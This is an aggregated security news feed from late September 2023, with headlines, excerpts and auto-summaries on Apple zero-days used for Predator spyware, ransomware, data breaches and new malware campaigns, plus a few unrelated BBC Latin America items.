            2023-09-23 https://thehackernews.com/2023/09/latest-apple-zero-days-used-to-hack.html
            The three zero-day flaws addressed by Apple on September 21, 2023, were leveraged as part of an iPhone exploit chain in an attempt to deliver a spyware strain called Predator targeting former Egyptian member of parliament Ahmed Eltantawy between May and September 2023. "The targeting took place after Eltantawy publicly stated his plans to run for President in the 2024 Egyptian elections," the

            Autosummary: CVE-2023-4762, a type confusion vulnerability in the V8 engine, was anonymously reported on August 16, 2023, and patched by Google on September 5, 2023, although the internet giant assesses that Cytrox/Intellexa may have used this vulnerability as a zero-day.


            City of Dallas has set a budget of $8.5 million to mitigate the May Royal ransomware attack

            exploits government ransomware
            2023-09-23 https://securityaffairs.com/151264/data-breach/city-of-dallas-royal-ransomware-attack-may.html

            The City of Dallas revealed that the Royal ransomware gang that hit the city system in May used a stolen account. In May 2023, a ransomware attack hit the IT systems at the City of Dallas, Texas. To prevent the threat from spreading within the network, the City shut down the impacted IT systems. The […]

            The post City of Dallas has set a budget of $8.5 million to mitigate the May Royal ransomware attack appeared first on Security Affairs.


            Autosummary: The ransomware encrypts the network shares found on the local network, as well as the local drives, with the AES algorithm. In March, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) to provide organizations with the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family. According to the notice published on the website of the OAG on August 07, 2023, exposed personal information includes names, addresses, social security information, health information, and health insurance information.


            Air Canada discloses data breach of employee and "certain records"

            financial
            2023-09-23 https://www.bleepingcomputer.com/news/security/air-canada-discloses-data-breach-of-employee-and-certain-records/
            Air Canada, the flag carrier and the largest airline of Canada, disclosed a cyber security incident this week in which hackers "briefly" obtained limited access to its internal systems. The incident resulted in the theft of a limited amount of personal information of some of its employees and "certain records." [...]



            Deadglyph: New Advanced Backdoor with Distinctive Malware Tactics

            exploits industry
            2023-09-23 https://thehackernews.com/2023/09/deadglyph-new-advanced-backdoor-with.html
            Cybersecurity researchers have discovered a previously undocumented advanced backdoor dubbed Deadglyph employed by a threat actor known as Stealth Falcon as part of a cyber espionage campaign. "Deadglyph's architecture is unusual as it consists of cooperating components – one a native x64 binary, the other a .NET assembly," ESET said in a new report shared with The Hacker News. "This combination

            Autosummary: Stealth Falcon (aka FruityArmor) was first exposed by the Citizen Lab in 2016, linking it to a set of targeted spyware attacks in the Middle East aimed at journalists, activists, and dissidents in the U.A.E. using spear-phishing lures embedding booby-trapped links pointing to macro-laced documents to deliver a custom implant capable of executing arbitrary commands.


            National Student Clearinghouse data breach impacts 890 schools

            financial
            2023-09-23 https://www.bleepingcomputer.com/news/security/national-student-clearinghouse-data-breach-impacts-890-schools/
            U.S. educational nonprofit National Student Clearinghouse has disclosed a data breach affecting 890 schools using its services across the United States. [...]

            Autosummary: The personally identifiable information (PII) contained in the stolen documents includes names, dates of birth, contact information, Social Security numbers, student ID numbers, and some school-related records (e.g., enrollment records, degree records, and course-level data).


            Government of Bermuda blames Russian threat actors for the cyber attack

            government rusia-ucrania
            2023-09-23 https://securityaffairs.com/151273/hacking/government-of-bermuda-cyberattack.html

            The Government of Bermuda believes that the recent cyberattack against its IT infrastructure was launched by Russian threat actors. This week a cyber attack hit the Government of Bermuda causing the interruption of internet/email and phone services. The attack impacted all the government departments. “The Department of Information and Digital Technology (IDT) is working quickly […]

            The post Government of Bermuda blames Russian threat actors for the cyber attack appeared first on Security Affairs.


            Autosummary: Walter Roban, JP, MP, provided an update on the cyberattack: “As a result of our network interruption, there will be no sitting of the House of Assembly,” a government spokeswoman had confirmed.


            Pablo Neruda: Chilean poet's death still shrouded in mystery

            latam
            2023-09-23 https://www.bbc.co.uk/news/world-latin-america-66853120?at_medium=RSS&at_campaign=KARANGA
            An investigation into whether Chilean poet Pablo Neruda was murdered has yet to reach its conclusion.



            England 71-0 Chile: Chile head coach Pablo Lemoine says his side "never had a chance"

            latam
            2023-09-23 https://www.bbc.co.uk/sport/rugby-union/66903773?at_medium=RSS&at_campaign=KARANGA
            Chile need to play more games against the world's best sides to be able to compete, says head coach Pablo Lemoine.

            Autosummary: Sigren believes in four years the results against top-ranked teams may change, drawing comparisons to Chile losing 56-0 to Canada in 2019 - a team they beat two years later to prevent Canada appearing in France.


            New stealthy and modular Deadglyph malware used in govt attacks

            exploits
            2023-09-23 https://www.bleepingcomputer.com/news/security/new-stealthy-and-modular-deadglyph-malware-used-in-govt-attacks/
            A novel and sophisticated backdoor malware named "Deadglyph" was seen used in a cyberespionage attack against a government agency in the Middle East. [...]

            Autosummary: The information collector uses WMI queries to feed the Orchestrator with the following information about the compromised system: operating system, network adapters, installed software, drives, services, drivers, processes, users, environment variables, and security software. The process creator is a command execution tool that executes specified commands as a new process and gives the result to the Orchestrator.


            Apple Rushes to Patch 3 New Zero-Day Flaws: iOS, macOS, Safari, and More Vulnerable

            exploits
            2023-09-22 https://thehackernews.com/2023/09/apple-rushes-to-patch-3-new-zero-day.html
            Apple has released yet another round of security patches to address three actively exploited zero-day flaws impacting iOS, iPadOS, macOS, watchOS, and Safari, taking the total tally of zero-day bugs discovered in its software this year to 16. The list of security vulnerabilities is as follows - CVE-2023-41991 - A certificate validation issue in the Security framework that could allow a

            Autosummary: There is evidence to suggest that both CVE-2023-41064, a buffer overflow vulnerability in Apple's Image I/O image parsing framework, and CVE-2023-4863, a heap buffer overflow in the WebP image library (libwebp), could refer to the same bug, according to Isosceles founder and former Google Project Zero researcher Ben Hawkes.


            Brazil's Supreme Court to vote on decriminalising abortion

            latam
            2023-09-22 https://www.bbc.co.uk/news/world-latin-america-66881900?at_medium=RSS&at_campaign=KARANGA
            Brazil's Supreme Court is to vote on decriminalising abortion in the first 12 weeks of pregnancy.



            Ransomware cyber insurance claims up by 27%

            exploits
            2023-09-22 https://www.helpnetsecurity.com/2023/09/22/ransomware-cyber-insurance-claims-h1-2023/

            Overall cyber insurance claims frequency increased by 12% in the first half of 2023, according to Coalition. Increase in ransomware claims frequency Coalition found that both claims frequency and severity rose for businesses in early 2023 across all revenue bands. Companies with over $100 million in revenue saw the largest increase (20%) in the number of claims as well as more substantial losses from attacks – with a 72% increase in claims severity from 2H … More

            The post Ransomware cyber insurance claims up by 27% appeared first on Help Net Security.


            Autosummary: “The cyber threat landscape has become more volatile, and, as a result, we’ve seen claims become more severe and more common than ever,” said Chris Hendricks, Head of Coalition Incident Response.


            SMEs overestimate their cybersecurity preparedness

            ciber
            2023-09-22 https://www.helpnetsecurity.com/2023/09/22/smes-cyber-threats/

            57% of SMEs have fallen victim to at least one cybersecurity breach, among whom 31% reported that their business experienced a breach within the past 12 months alone, according to Guardz. The increasing number of evolving cyber threats poses a significant risk to SMEs. Rising patterns show frequent and sophisticated attacks, highlighting the urgent need for effective security measures. Businesses neglect employee cybersecurity training Meanwhile, 29% of small and medium-sized businesses reported currently having no … More

            The post SMEs overestimate their cybersecurity preparedness appeared first on Help Net Security.


            Autosummary: However, 44% of respondents believe that their current antivirus solution fully protects their business, employees, and data, and 25% of businesses admit that they do not regularly train their employees on cybersecurity best practices, or have never done so.


            GitLab fixes critical vulnerability, patch now! (CVE-2023-5009)

            exploits
            2023-09-22 https://www.helpnetsecurity.com/2023/09/22/cve-2023-5009/

            GitLab has fixed a critical vulnerability (CVE-2023-5009) in the Enterprise Edition (EE) and Community Edition (CE) of its widely used DevOps platform. The flaw may allow a threat actor to abuse scan execution policies to run pipelines as another user. About the vulnerability (CVE-2023-5009) CVE-2023-5009 – discovered by software developer and bug hunter Johan Carlsson (joaxcar) in GitLab EE – affects all versions starting from 13.12 before 16.2.7 and all versions starting from 16.3 before … More

            The post GitLab fixes critical vulnerability, patch now! (CVE-2023-5009) appeared first on Help Net Security.


            Autosummary: About the vulnerability (CVE-2023-5009) CVE-2023-5009 – discovered by software developer and bug hunter Johan Carlsson (joaxcar) in GitLab EE – affects all versions starting from 13.12 before 16.2.7 and all versions starting from 16.3 before 16.3.4, IF the “direct transfers” and “security policies” features are enabled at the same time.


            Apple fixes 3 zero-day vulnerabilities exploited to compromise iPhones

            exploits
            2023-09-22 https://www.helpnetsecurity.com/2023/09/22/cve-2023-41992-cve-2023-41991-cve-2023-41993/

            Apple has released updates for iOS and iPadOS, macOS, watchOS, and Safari to fix three zero-day vulnerabilities (CVE-2023-41992, CVE-2023-41991, CVE-2023-41993) exploited “against versions of iOS before iOS 16.7.” Bill Marczak of The Citizen Lab at The University of Toronto’s Munk School and Maddie Stone of Google’s Threat Analysis Group have been credited with reporting them, so the flaws have probably been used to deploy spyware. The patched zero-days (CVE-2023-41992, CVE-2023-41991, CVE-2023-41993) CVE-2023-41992, in the Kernel … More

            The post Apple fixes 3 zero-day vulnerabilities exploited to compromise iPhones appeared first on Help Net Security.


            Autosummary: The patched zero-days (CVE-2023-41992, CVE-2023-41991, CVE-2023-41993) CVE-2023-41992, in the Kernel framework, allows a local attacker to elevate privileges.


            Iranian Nation-State Actor OilRig Targets Israeli Organizations

            government
            2023-09-22 https://thehackernews.com/2023/09/iranian-nation-state-actor-oilrig.html
            Israeli organizations were targeted as part of two different campaigns orchestrated by the Iranian nation-state actor known as OilRig in 2021 and 2022. The campaigns, dubbed Outer Space and Juicy Mix, entailed the use of two previously documented first-stage backdoors called Solar and Mango, which were deployed to collect sensitive information from major browsers and the Windows Credential

            Autosummary: Storm-0133, also associated with MOIS, exclusively targets Israeli local government agencies and companies serving the defense, lodging, and healthcare sectors, the Windows maker said.


            Norton Secure Browser blocks malicious websites and phishing attempts

            financial
            2023-09-22 https://www.helpnetsecurity.com/2023/09/22/norton-secure-browser/

            To help protect consumers from browser-based security, privacy and identity threats, Norton, a consumer Cyber Safety brand of Gen, has released Norton Secure Browser. Just as a passport is essential for travel, web browsers are essential for exploring the internet, and serve as the gateway to websites, information, and experiences. However, they are also superhighways of personal information for cybercriminals to exploit, and the dream tool for advertisers to track online activity and collect insights … More

            The post Norton Secure Browser blocks malicious websites and phishing attempts appeared first on Help Net Security.


            Autosummary: “Cybercriminals are becoming more creative in their pursuits to attack people this year, and advertisers are more eager than ever to capture as many interactions as possible to profile people and target them with ads and content,” said Ben Wadors, Director of Browser and Search at Gen. “Norton Secure Browser helps tackle both problems.


            Keysight collaborates with Synopsys to secure IoT devices against attacks

            industry
            2023-09-22 https://www.helpnetsecurity.com/2023/09/22/keysight-synopsys/

            Keysight Technologies and Synopsys are partnering to provide internet of things (IoT) device makers with a comprehensive cybersecurity assessment solution to ensure consumers are protected when devices are shipped to market. Under the arrangement, the Synopsys Defensics fuzzing tool will be embedded as an option into the Keysight IoT Security Assessment solution. The global IoT device market is experiencing notable growth due to the rise in adoption of IoT devices and is projected to reach … More

            The post Keysight collaborates with Synopsys to secure IoT devices against attacks appeared first on Help Net Security.




            Information of Air Canada employees exposed in recent cyberattack

            ciber
            2023-09-22 https://securityaffairs.com/151202/data-breach/air-canada-data-breach-2.html

            Air Canada, the flag carrier and largest airline of Canada, announced that the personal information of some employees was exposed as a result of a recent cyberattack. Air Canada, the flag carrier and largest airline of Canada, announced that threat actors had access to the personal information of some employees during a recent cyberattack. “An […]

            The post Information of Air Canada employees exposed in recent cyberattack appeared first on Security Affairs.


            Autosummary: (Pierluigi Paganini, September 22, 2023) Air Canada, the flag carrier and largest airline of Canada, announced that the personal information of some employees was exposed as a result of a recent cyberattack.


            Recently patched Apple, Chrome zero-days exploited in spyware attacks

            exploits
            2023-09-22 https://www.bleepingcomputer.com/news/security/recently-patched-apple-chrome-zero-days-exploited-in-spyware-attacks/
            Security researchers with The Citizen Lab and Google's Threat Analysis Group (TAG) revealed today that three zero-days patched by Apple on Thursday were abused as part of an exploit chain to install Cytrox's Predator spyware. [...]

            Autosummary: On iOS devices, the attackers' zero-day exploit used CVE-2023-41993 for initial remote code execution (RCE) in Safari using maliciously crafted web pages, the CVE-2023-41991 bug to bypass signature validation, and CVE-2023-41992 for kernel privilege escalation.


            Government of Bermuda links cyberattack to Russian hackers

            government rusia-ucrania ciber
            2023-09-22 https://www.bleepingcomputer.com/news/security/government-of-bermuda-links-cyberattack-to-russian-hackers/
            The Government of British Overseas Territory Bermuda has linked a cyberattack affecting all its departments' IT systems since Thursday to hackers based out of Russia. [...]



            T-Mobile denies new data breach rumors, points to authorized retailer

            financial
            2023-09-22 https://www.bleepingcomputer.com/news/security/t-mobile-denies-new-data-breach-rumors-points-to-authorized-retailer/
            T-Mobile has denied suffering another data breach following Thursday night reports that a threat actor leaked a large database allegedly containing T-Mobile employees' data. [...]

            Autosummary: (Image: forum post claiming to share T-Mobile data. Source: BleepingComputer) The archive posted to the hacking forum contains a large amount of data, including employee IDs, employment status, hire dates, termination dates, rehire dates, job titles, department, names, last four digits of social security number, and email addresses.


            New Variant of Banking Trojan BBTok Targets Over 40 Latin American Banks

            financial exploits
            2023-09-22 https://thehackernews.com/2023/09/new-variant-of-banking-trojan-bbtok.html
            An active malware campaign targeting Latin America is dispensing a new variant of a banking trojan called BBTok, particularly users in Brazil and Mexico. "The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering its 2FA code to their bank accounts or into entering their payment card number,"

            Autosummary: It's equipped with features that run the typical trojan gamut, allowing it to enumerate and kill processes, issue remote commands, manipulate the keyboard, and serve fake login pages for banks operating in the two countries.


            CISA adds Trend Micro Apex One and Worry-Free Business Security flaw to its Known Exploited Vulnerabilities catalog

            exploits
            2023-09-22 https://securityaffairs.com/151211/hacking/cisa-adds-trend-micro-apex-one-rce-to-known-exploited-vulnerabilities-catalog.html

            US CISA added the flaw CVE-2023-41179 in Trend Micro Apex and other security products to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added the high-severity flaw CVE-2023-41179 (CVSS score 7.2) affecting Trend Micro Apex One and Worry-Free Business Security to its Known Exploited Vulnerabilities Catalog. Trend Micro this week has released security updates to patch […]

            The post CISA adds Trend Micro Apex One and Worry-Free Business Security flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.


            Autosummary: Trend Micro this week has released security updates to patch an actively exploited zero-day vulnerability, tracked as CVE-2023-41179, impacting endpoint security products, including Apex One, Apex One SaaS, and Worry-Free Business Security products.


            Dallas says Royal ransomware breached its network using stolen account

            exploits ransomware
            2023-09-22 https://www.bleepingcomputer.com/news/security/dallas-says-royal-ransomware-breached-its-network-using-stolen-account/
            The City of Dallas, Texas, said this week that the Royal ransomware attack that forced it to shut down all IT systems in May started with a stolen account. [...]

            Autosummary: The process of restoring all servers took just over 5 weeks, from May 9th, when the financial server was revived, to June 13th, when the last server affected by the attack, the waste management server, was restored.


            Recently patched Apple and Chrome zero-days exploited to infect devices in Egypt with Predator spyware

            exploits
            2023-09-22 https://securityaffairs.com/151218/mobile-2/apple-chrome-zero-days-predator-spyware.html

            Citizen Lab and Google’s TAG revealed that the three recently patched Apple zero-days were used to install Cytrox Predator spyware. Researchers from the Citizen Lab and Google’s Threat Analysis Group (TAG) revealed that the three Apple zero-days addressed this week were used as part of an exploit to install Cytrox Predator spyware. Apple this week […]

            The post Recently patched Apple and Chrome zero-days exploited to infect devices in Egypt with Predator spyware appeared first on Security Affairs.


            Autosummary: “During our investigation, we worked with Google’s Threat Analysis Group (TAG) to obtain an iPhone zero-day exploit chain (CVE-2023-41991, CVE-2023-41992, CVE-2023-41993) designed to install Predator on iOS versions through 16.6.1.” (Pierluigi Paganini, September 22, 2023) Citizen Lab and Google’s TAG revealed that the three recently patched Apple zero-days were used to install Cytrox Predator spyware.


            Emergency update! Apple patches three zero-days

            exploits
            2023-09-22 https://www.malwarebytes.com/blog/news/2023/09/emergency-update-apple-patches-three-actively-exploited-zero-days

            Categories: Exploits and vulnerabilities, News

            Tags: Apple, emergency, update, CVE-2023-41991, CVE-2023-41992, CVE-2023-41993

            Apple has released patches for three zero-day vulnerabilities that may have been actively exploited.


            The post Emergency update! Apple patches three zero-days appeared first on Malwarebytes Labs.


            Autosummary: The Citizen Lab is an interdisciplinary laboratory based at the Munk School of Global Affairs & Public Policy, University of Toronto, focusing on research and development at the intersection of information and communication technologies, human rights, and global security.


            How companies can take control of their cybersecurity

            ciber
            2023-09-21 https://www.helpnetsecurity.com/2023/09/21/baya-lonqueux-reciproc-it-cybersecurity-risk-management/

            In this Help Net Security interview, Baya Lonqueux, CEO at Reciproc-IT, discusses the evolving cybersecurity landscape and the essential skillsets needed for teams working in this field. The interview highlights the shift from technical expertise to a focus on organizational and governance skills for managing business cybersecurity risks. Lonqueux also addresses the proactive measures required to mitigate cybersecurity risks, emphasizing the importance of identifying security needs, ensuring compliance, and simulating risks for prioritized actions. Even … More

            The post How companies can take control of their cybersecurity appeared first on Help Net Security.


            Autosummary: Lonqueux also addresses the proactive measures required to mitigate cybersecurity risks, emphasizing the importance of identifying security needs, ensuring compliance, and simulating risks for prioritized actions. Companies, for their part, need to target their protection strategy, securing what is sensitive, isolating critical assets to avoid massive surveillance protections that encourage error.


            Regulatory pressure complicates cybersecurity for industrial equipment manufacturers

            industry ciber
            2023-09-21 https://www.helpnetsecurity.com/2023/09/21/industrial-equipment-manufacturers-security/

            50% of companies lack a dedicated security function for control systems and devices within their organizational structure, according to Cybellum. Security incidents involving industrial organizations have seen a sharp rise in recent years, with notable cases highlighting the vulnerabilities in our interconnected world. IT-OT convergence, as well as the trend towards remote maintenance, amplify potential risks even further. As industrial devices become increasingly software-driven machines reliant on an insecure software supply chain, and with regulatory … More

            The post Regulatory pressure complicates cybersecurity for industrial equipment manufacturers appeared first on Help Net Security.




            Beware: Fake Exploit for WinRAR Vulnerability on GitHub Infects Users with VenomRAT

            exploits
            2023-09-21 https://thehackernews.com/2023/09/beware-fake-exploit-for-winrar.html
            A malicious actor released a fake proof-of-concept (PoC) exploit for a recently disclosed WinRAR vulnerability on GitHub with an aim to infect users who downloaded the code with VenomRAT malware. "The fake PoC meant to exploit this WinRAR vulnerability was based on a publicly available PoC script that exploited a SQL injection vulnerability in an application called GeoServer, which is tracked as

            Autosummary: "The fake PoC meant to exploit this WinRAR vulnerability was based on a publicly available PoC script that exploited a SQL injection vulnerability in an application called GeoServer, which is tracked as CVE-2023-25157," Palo Alto Networks Unit 42 researcher Robert Falcone said.


            Fake WinRAR PoC spread VenomRAT malware

            exploits
            2023-09-21 https://www.helpnetsecurity.com/2023/09/21/fake-winrar-poc/

            An unknown threat actor has released a fake proof of concept (PoC) exploit for CVE-2023-4047, a recently fixed remote code execution (RCE) vulnerability in WinRAR, to spread the VenomRAT malware. The fake WinRAR PoC On August 17, 2023, Trend Micro’s Zero Day Initiative reported the RCE vulnerability (CVE-2023-4047) that allowed threat actors to execute arbitrary code on an affected WinRAR installation. The attacker (“whalersplonk”) took the opportunity to release a fake PoC on GitHub only … More

            The post Fake WinRAR PoC spread VenomRAT malware appeared first on Help Net Security.




            Critical Trend Micro vulnerability exploited in the wild (CVE-2023-41179)

            exploits
            2023-09-21 https://www.helpnetsecurity.com/2023/09/21/cve-2023-41179/

            Trend Micro has fixed a critical zero-day vulnerability (CVE-2023-41179) in several of its endpoint security products for enterprises that has been spotted being exploited in the wild. About CVE-2023-41179 The nature of the flaw hasn’t been revealed, but we know it’s present in the third-party AV uninstaller module provided with the products, and can be exploited to execute arbitrary code with the system privilege on the PC where a vulnerable security agent is installed. CVE-2023-41179 … More

            The post Critical Trend Micro vulnerability exploited in the wild (CVE-2023-41179) appeared first on Help Net Security.




            Cyber Group "Gold Melody" Selling Compromised Access to Ransomware Attackers

            exploits ransomware
            2023-09-21 https://thehackernews.com/2023/09/cyber-group-gold-melody-selling.html
            A financially motivated threat actor has been outed as an initial access broker (IAB) that sells access to compromised organizations for other adversaries to conduct follow-on attacks such as ransomware. SecureWorks Counter Threat Unit (CTU) has dubbed the e-crime group Gold Melody, which is also known by the names Prophet Spider (CrowdStrike) and UNC961 (Mandiant). "This financially motivated

            Autosummary: Gold Melody has been previously linked to attacks exploiting security flaws in JBoss Messaging (CVE-2017-7504), Citrix ADC (CVE-2019-19781), Oracle WebLogic (CVE-2020-14750 and CVE-2020-14882), GitLab (CVE-2021-22205), Citrix ShareFile Storage Zones Controller (CVE-2021-22941), Atlassian Confluence (CVE-2021-26084), ForgeRock AM (CVE-2021-35464), and Apache Log4j (CVE-2021-44228) servers.


            Ukrainian Hacker Suspected to be Behind "Free Download Manager" Malware Attack

            exploits
            2023-09-21 https://thehackernews.com/2023/09/ukrainian-hacker-suspected-to-be-behind.html
            The maintainers of Free Download Manager (FDM) have acknowledged a security incident dating back to 2020 that led to its website being used to distribute malicious Linux software. "It appears that a specific web page on our site was compromised by a Ukrainian hacker group, exploiting it to distribute malicious software," it said in an alert last week. "Only a small subset of users, specifically

            Autosummary: "It appears that a specific web page on our site was compromised by a Ukrainian hacker group, exploiting it to distribute malicious software," it said in an alert last week.


            Apple emergency updates fix 3 new zero-days exploited in attacks

            exploits
            2023-09-21 https://www.bleepingcomputer.com/news/apple/apple-emergency-updates-fix-3-new-zero-days-exploited-in-attacks/
            Apple released emergency security updates to patch three new zero-day vulnerabilities exploited in attacks targeting iPhone and Mac users, for a total of 16 zero-days patched this year. [...]


            Pizza Hut Australia warns 193,000 customers of a data breach

            financial
            2023-09-21 https://www.bleepingcomputer.com/news/security/pizza-hut-australia-warns-193-000-customers-of-a-data-breach/
            Pizza Hut Australia is sending data breach notifications to customers, warning that a cyberattack allowed hackers to access their personal information. [...]


            Snatch ransomware – what you need to know

            exploits ransomware
            2023-09-21 https://www.tripwire.com/state-of-security/snatch-ransomware-what-you-need-know
            The FBI and US Cybersecurity and Infrastructure Security Agency (CISA) have issued a joint advisory warning organisations about a ransomware-as-a-service operation called "Snatch." Learn more about the threat in my article for the Tripwire State of Security blog.

            Autosummary: Snatch first appeared in 2018, albeit originally under the name Team Truniger (Truniger, explains the FBI and CISA advisory, was the online handle of a key member who had previously worked as an affiliate of the GandCrab ransomware-as-a-service operation). Advice for defending against Snatch includes using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication.


            Researchers Raise Red Flag on P2PInfect Malware with 600x Activity Surge

            exploits
            2023-09-21 https://thehackernews.com/2023/09/researchers-raise-red-flag-on-p2pinfect.html
            The peer-to-peer (P2P) worm known as P2PInfect has witnessed a surge in activity since late August 2023, with a 600x jump between September 12 and 19, 2023. "This increase in P2PInfect traffic has coincided with a growing number of variants seen in the wild, suggesting that the malware’s developers are operating at an extremely high development cadence," Cado Security researcher Matt Muir

            Autosummary: A majority of the compromises have been reported in China, the U.S., Germany, the U.K., Singapore, Hong Kong, and Japan.


            ‘Sandman’ hackers backdoor telcos with new LuaDream malware

            exploits
            2023-09-21 https://www.bleepingcomputer.com/news/security/sandman-hackers-backdoor-telcos-with-new-luadream-malware/
            A previously unknown threat actor dubbed "Sandman" targets telecommunication service providers in the Middle East, Western Europe, and South Asia, using a modular info-stealing malware named "LuaDream." [...]

            Autosummary: The malware’s main components (SentinelLabs). Upon initialization, LuaDream connects to a C2 server (via TCP, HTTPS, WebSocket, or QUIC) and sends gathered information, including malware versions, IP/MAC addresses, OS details, etc.


            Mysterious "Sandman" Threat Actor Targets Telecom Providers Across Three Continents

            ransomware
            2023-09-21 https://thehackernews.com/2023/09/mysterious-sandman-threat-actor-targets.html
            A previously undocumented threat actor dubbed Sandman has been attributed to a set of cyber attacks targeting telecommunication providers in the Middle East, Western Europe, and the South Asian subcontinent. Notably, the intrusions leverage a just-in-time (JIT) compiler for the Lua programming language known as LuaJIT as a vehicle to deploy a novel implant called LuaDream. "The activities we

            Autosummary: The disclosure coincides with a parallel report from SentinelOne which detailed sustained strategic intrusions by Chinese threat actors in Africa, including those aimed at the telecommunication, finance and government sectors, as part of activity clusters dubbed BackdoorDiplomacy, Earth Estries, and Operation Tainted Love.


            Apple rolled out emergency updates to address 3 new actively exploited zero-day flaws

            exploits
            2023-09-21 https://securityaffairs.com/151174/hacking/apple-zero-days.html

            Apple released emergency security updates to address three new actively exploited zero-day vulnerabilities. Apple released emergency security updates to address three new zero-day vulnerabilities (CVE-2023-41993, CVE-2023-41991, CVE-2023-41992) that have been exploited in attacks in the wild. The three flaws were discovered by Bill Marczak of The Citizen Lab at The University of Toronto’s Munk School […]

            The post Apple rolled out emergency updates to address 3 new actively exploited zero-day flaws appeared first on Security Affairs.

            Autosummary: Fixes are available for iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later. Apple has already patched 16 actively exploited zero-day vulnerabilities in 2023; below is the list of the flaws fixed by the company: September 2023 – CVE-2023-41064 and CVE-2023-41061.


            Involved in a data breach? Here’s what you need to know

            financial
            2023-09-21 https://www.malwarebytes.com/blog/personal/2023/09/involved-in-a-data-breach-heres-what-you-need-to-know

            Categories: News

            Categories: Personal

            If you’ve received a message from a company saying your data has been caught up in a breach, you might be unsure what to do next. Well, we have some tips for you...

            The post Involved in a data breach? Here’s what you need to know appeared first on Malwarebytes Labs.

            Autosummary: 1. Check the company’s advice: every breach is different, so check the company’s official channels to find out what’s happened and what data has been breached. 3. Enable multi-factor authentication: multi-factor authentication (MFA) adds an extra layer of security when logging in to your online accounts, and stops anyone from logging in with just your password.


            Steer clear of cryptocurrency recovery phrase scams

            financial
            2023-09-21 https://www.malwarebytes.com/blog/personal/2023/09/steer-clear-of-cryptocurrency-recovery-phrase-scams

            Categories: Personal


            We take a look at a common cryptocurrency scam which focuses on your recovery phrase.


            The post Steer clear of cryptocurrency recovery phrase scams appeared first on Malwarebytes Labs.

            Autosummary: No matter the third party website, offer, video, service, or any form of giveaway: don’t do it.


            Brazil’s top court boosts indigenous rights in landmark ruling

            latam
            2023-09-21 https://www.bbc.co.uk/news/world-latin-america-58328604?at_medium=RSS&at_campaign=KARANGA
            The Supreme Court sets a precedent for land claims by restoring territory to the Xokleng people.


            Brazil’s Supreme Court rules in favour of indigenous rights

            latam
            2023-09-21 https://www.bbc.co.uk/news/world-latin-america-66886163?at_medium=RSS&at_campaign=KARANGA
            Brazil’s Supreme Court rejects efforts to restrict indigenous peoples’ rights to reservations on ancestral lands.


            18 free Microsoft Azure cybersecurity resources you should check out

            ciber
            2023-09-20 https://www.helpnetsecurity.com/2023/09/20/free-microsoft-azure-cybersecurity-resources/

            Far exceeding a traditional public cloud platform, Azure is a comprehensive suite of over 200 products and cloud services engineered to solve current challenges and pave the way for the future. Whether you’re looking to build, run, or manage applications, Azure’s extensive offerings span multiple clouds, on-premises setups, and even the edge, allowing you the flexibility to use the tools and frameworks you’re most comfortable with. Here’s a list of free Azure cybersecurity resources that … More

            The post 18 free Microsoft Azure cybersecurity resources you should check out appeared first on Help Net Security.

            Autosummary: By the end of this module you will be able to: implement and manage a user risk policy; implement and manage sign-in risk policies; implement and manage an MFA registration policy; monitor, investigate, and remediate elevated risky users (33 min). Explore how to use built-in Azure roles, managed identities, and RBAC policy to control access to Azure resources. By the end of this module, you are able to: design security operations capabilities in hybrid and multi-cloud environments; design centralized logging and auditing; design SIEM solutions; design a solution for detection and response that includes XDR; design a solution for SOAR; design security workflows; design and evaluate threat detection with the MITRE ATT&CK framework. More resources: by the end of this module, you’re able to: evaluate security posture by using Microsoft Cloud Security Benchmark, Microsoft Defender for Cloud, and Secure Scores; design integrated security posture management and workload protection solutions in hybrid and multicloud environments; design cloud workload protection solutions that use Microsoft Defender for Cloud (42 min). Securing Azure AI Services can help prevent data loss and privacy violations for user data that may be part of the solution. By the end of this module, you will be able to: define what a key vault is and how it protects certificates and secrets; deploy and configure Azure Key Vault; secure access and administration of your key vault; store keys and secrets in your key vault; explore key security considerations like key rotation and backup/recovery (45 min). Learn how Azure Storage provides multilayered security to protect your data.


            Rising OT/ICS cybersecurity incidents reveal alarming trend

            industry ciber
            2023-09-20 https://www.helpnetsecurity.com/2023/09/20/ot-ics-cybersecurity-incidents/

            60% of cyberattacks against the industrial sector are led by state-affiliated actors and often unintentionally enabled by internal personnel (about 33% of the time), according to Rockwell Automation. This corroborates other industry research showing OT/ICS (Industrial Control Systems) cybersecurity incidents are increasing in volume and frequency, and are targeting critical infrastructure, such as energy producers. Insiders unintentionally aid threat actors “Energy, critical manufacturing, water treatment and nuclear facilities are among the types of critical infrastructure … More

            The post Rising OT/ICS cybersecurity incidents reveal alarming trend appeared first on Help Net Security.

            Autosummary: Insiders unintentionally aid threat actors. “Energy, critical manufacturing, water treatment and nuclear facilities are among the types of critical infrastructure industries under attack in the majority of reported incidents,” said Mark Cristiano, commercial director of Global Cybersecurity Services at Rockwell Automation.


            Strong compliance management is crucial for fintech-bank partnerships

            financial
            2023-09-20 https://www.helpnetsecurity.com/2023/09/20/fintechs-compliance/

            72% of banks and credit unions are prioritizing compliance when evaluating fintechs, citing it as their top criteria in the due diligence process, according to Ncontracts. As banks and credit unions evaluate fintech partnerships, cybersecurity (62%) is also a critical factor, followed by return on investment (46.3%) and reputation (44.4%). Financial institutions look to streamline operations Bank-fintech partnerships continue to rise as financial institutions look to streamline operations, improve customer experiences, drive profitability, and manage … More

            The post Strong compliance management is crucial for fintech-bank partnerships appeared first on Help Net Security.

            Autosummary: Financial institutions look to streamline operations. Bank-fintech partnerships continue to rise as financial institutions look to streamline operations, improve customer experiences, drive profitability, and manage risk and compliance efforts.


            Trend Micro Releases Urgent Fix for Actively Exploited Critical Security Vulnerability

            exploits
            2023-09-20 https://thehackernews.com/2023/09/trend-micro-releases-urgent-fix-for.html
